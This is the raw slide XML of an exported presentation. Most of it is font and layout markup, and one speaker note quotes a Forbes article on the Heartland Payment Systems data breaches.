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Lst>
  <p:sldSz cy="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin"/>
      <p:regular r:id="rId73"/>
      <p:bold r:id="rId74"/>
      <p:italic r:id="rId75"/>
      <p:boldItalic r:id="rId76"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono Medium"/>
      <p:regular r:id="rId77"/>
      <p:bold r:id="rId78"/>
      <p:italic r:id="rId79"/>
      <p:boldItalic r:id="rId80"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium"/>
      <p:regular r:id="rId81"/>
      <p:bold r:id="rId82"/>
      <p:italic r:id="rId83"/>
      <p:boldItalic r:id="rId84"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto"/>
      <p:regular r:id="rId85"/>
      <p:bold r:id="rId86"/>
      <p:italic r:id="rId87"/>
      <p:boldItalic r:id="rId88"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Inconsolata"/>
      <p:regular r:id="rId89"/>
      <p:bold r:id="rId90"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light"/>
      <p:regular r:id="rId91"/>
      <p:bold r:id="rId92"/>
      <p:italic r:id="rId93"/>
      <p:boldItalic r:id="rId94"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mono"/>
      <p:regular r:id="rId95"/>
      <p:bold r:id="rId96"/>
      <p:italic r:id="rId97"/>
      <p:boldItalic r:id="rId9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6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53CCE35E-85F1-4C2B-8E29-DD4EB081A20E}">
  <a:tblStyle styleId="{53CCE35E-85F1-4C2B-8E29-DD4EB081A20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964"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RobotoMono-regular.fntdata"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-boldItalic.fntdata"/><Relationship Id="rId97" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-italic.fntdata"/><Relationship Id="rId96" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold.fntdata"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId98" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMono-bold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RobotoLight-regular.fntdata"/><Relationship Id="rId90" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-bold.fntdata"/><Relationship Id="rId93" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-italic.fntdata"/><Relationship Id="rId92" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoLight-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RobotoMedium-boldItalic.fntdata"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-italic.fntdata"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-bold.fntdata"/><Relationship Id="rId85" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-regular.fntdata"/><Relationship Id="rId88" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-boldItalic.fntdata"/><Relationship Id="rId87" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Roboto-italic.fntdata"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Inconsolata-regular.fntdata"/><Relationship Id="rId80" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-boldItalic.fntdata"/><Relationship Id="rId82" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-bold.fntdata"/><Relationship Id="rId81" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMedium-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Thin-regular.fntdata"/><Relationship Id="rId72" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide66.xml"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-italic.fntdata"/><Relationship Id="rId74" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-bold.fntdata"/><Relationship Id="rId77" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-regular.fntdata"/><Relationship Id="rId76" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoThin-boldItalic.fntdata"/><Relationship Id="rId79" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-italic.fntdata"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/RobotoMonoMedium-bold.fntdata"/><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9" name="Shape 1019"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1020" name="Google Shape;1020;g4f80a3047b_0_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4f80a3047b_0_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9" name="Shape 1089"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1090" name="Google Shape;1090;g5f1394fd9e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5f1394fd9e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5" name="Shape 1095"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1096" name="Google Shape;1096;g63d53327d6_2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63d53327d6_2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3" name="Shape 1103"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1104" name="Google Shape;1104;g56c3c4dd9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56c3c4dd9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9" name="Shape 1109"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1110" name="Google Shape;1110;g56c3c4dd9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56c3c4dd9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Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>The Heartland Payment Systems breach: https://www.forbes.com/sites/davelewis/2015/05/31/heartland-payment-systems-suffers-data-breach/</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sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Excerpted from the article above:</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sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Excerpted from the article above:</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t>
            </a:r>
            <a:r>
              <a:rPr i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Heartland Payment Systems suffered a data breach on May 8th that affected their payroll customers. This is unfortunate news when you take into account that they analysts were of a mind that the company would be posting a $0.64 earnings per share. The payroll processing company also has product offerings in loyalty cards, mobile payments and payment processing.</a:t>
            </a:r>
            <a:endParaRPr i="1"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i="1" lang="en" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Heartland Payment systems is a company that started in 1997 and has had a bit of a storied history from the perspective of data security. They had the unfortunate title of falling victim to one of the largest data breaches in recent memory. The company suffered a massive attack against their systems in which attackers made off with as many as 100 million debit and credit cards in 2008.</a:t>
            </a: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0" name="Shape 1120"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1121" name="Google Shape;1121;g5ea219d9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5ea219d9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8" name="Shape 1128"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1129" name="Google Shape;1129;g56c3c4dd9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56c3c4dd9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4" name="Shape 1134"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1135" name="Google Shape;1135;g56c3c4dd9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56c3c4dd9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1" name="Shape 1141"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1142" name="Google Shape;1142;g56c3c4dd9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56c3c4dd9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7" name="Shape 1147"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1148" name="Google Shape;1148;g63d53327d6_2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63d53327d6_2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5" name="Shape 1155"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1156" name="Google Shape;1156;g63d53327d6_2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63d53327d6_2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6" name="Shape 1026"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;g4ff33a29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4ff33a29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4" name="Shape 1164"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1165" name="Google Shape;1165;g63d53327d6_2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63d53327d6_2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2" name="Shape 1172"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;g63d53327d6_2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63d53327d6_2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1" name="Shape 1181"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1182" name="Google Shape;1182;g63d53327d6_2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63d53327d6_2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9" name="Shape 1189"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1190" name="Google Shape;1190;g63d53327d6_2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63d53327d6_2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8" name="Shape 1198"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1199" name="Google Shape;1199;g63d53327d6_2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63d53327d6_2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7" name="Shape 1207"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1208" name="Google Shape;1208;g63d53327d6_2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63d53327d6_2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6" name="Shape 1216"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;g63d53327d6_2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63d53327d6_2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4" name="Shape 1224"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1225" name="Google Shape;1225;g63d53327d6_2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63d53327d6_2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3" name="Shape 1233"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1234" name="Google Shape;1234;g63d53327d6_2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63d53327d6_2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1" name="Shape 1241"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1242" name="Google Shape;1242;g63d53327d6_2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63d53327d6_2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7" name="Shape 1037"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1038" name="Google Shape;1038;g56c3c4dd9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56c3c4dd9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0" name="Shape 1250"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251" name="Google Shape;1251;g56c3c4dd9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56c3c4dd9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7" name="Shape 1257"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1258" name="Google Shape;1258;g56c3c4dd9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56c3c4dd9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3" name="Shape 1263"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1264" name="Google Shape;1264;g63d53327d6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63d53327d6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0" name="Shape 1270"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1271" name="Google Shape;1271;g63d53327d6_2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63d53327d6_2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8" name="Shape 1278"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1279" name="Google Shape;1279;g63d53327d6_2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63d53327d6_2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6" name="Shape 1286"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1287" name="Google Shape;1287;g63d53327d6_2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8" name="Google Shape;1288;g63d53327d6_2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5" name="Shape 1295"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1296" name="Google Shape;1296;g56c3c4dd97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7" name="Google Shape;1297;g56c3c4dd97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9" name="Shape 1299"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1300" name="Google Shape;1300;g56c3c4dd9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56c3c4dd9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5" name="Shape 1305"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1306" name="Google Shape;1306;g56c3c4dd9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56c3c4dd9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2" name="Shape 1312"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1313" name="Google Shape;1313;g56c3c4dd97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56c3c4dd97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8" name="Shape 1048"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1049" name="Google Shape;1049;g5130e1e3cc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5130e1e3cc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8" name="Shape 1318"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1319" name="Google Shape;1319;g62be7b77d4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62be7b77d4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6" name="Shape 1326"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1327" name="Google Shape;1327;g62be7b77d4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62be7b77d4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5" name="Shape 1335"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1336" name="Google Shape;1336;g62be7b77d4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7" name="Google Shape;1337;g62be7b77d4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5" name="Shape 1345"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1346" name="Google Shape;1346;g62be7b77d4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7" name="Google Shape;1347;g62be7b77d4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4" name="Shape 1354"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1355" name="Google Shape;1355;g63d53327d6_2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63d53327d6_2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4" name="Shape 1364"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1365" name="Google Shape;1365;g63d53327d6_2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6" name="Google Shape;1366;g63d53327d6_2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5" name="Shape 1375"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1376" name="Google Shape;1376;g56c3c4dd97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7" name="Google Shape;1377;g56c3c4dd97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1" name="Shape 1381"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1382" name="Google Shape;1382;g5ea219d93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3" name="Google Shape;1383;g5ea219d93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9" name="Shape 1389"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1390" name="Google Shape;1390;g56c3c4dd97_0_1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1" name="Google Shape;1391;g56c3c4dd97_0_1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5" name="Shape 1395"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1396" name="Google Shape;1396;g5ea219d93d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7" name="Google Shape;1397;g5ea219d93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5" name="Shape 1055"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1056" name="Google Shape;1056;g5130e1e3cc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5130e1e3cc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3" name="Shape 1403"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1404" name="Google Shape;1404;g56c3c4dd97_0_1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5" name="Google Shape;1405;g56c3c4dd97_0_1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9" name="Shape 1409"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1410" name="Google Shape;1410;g5ea219d93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5ea219d93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7" name="Shape 1417"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
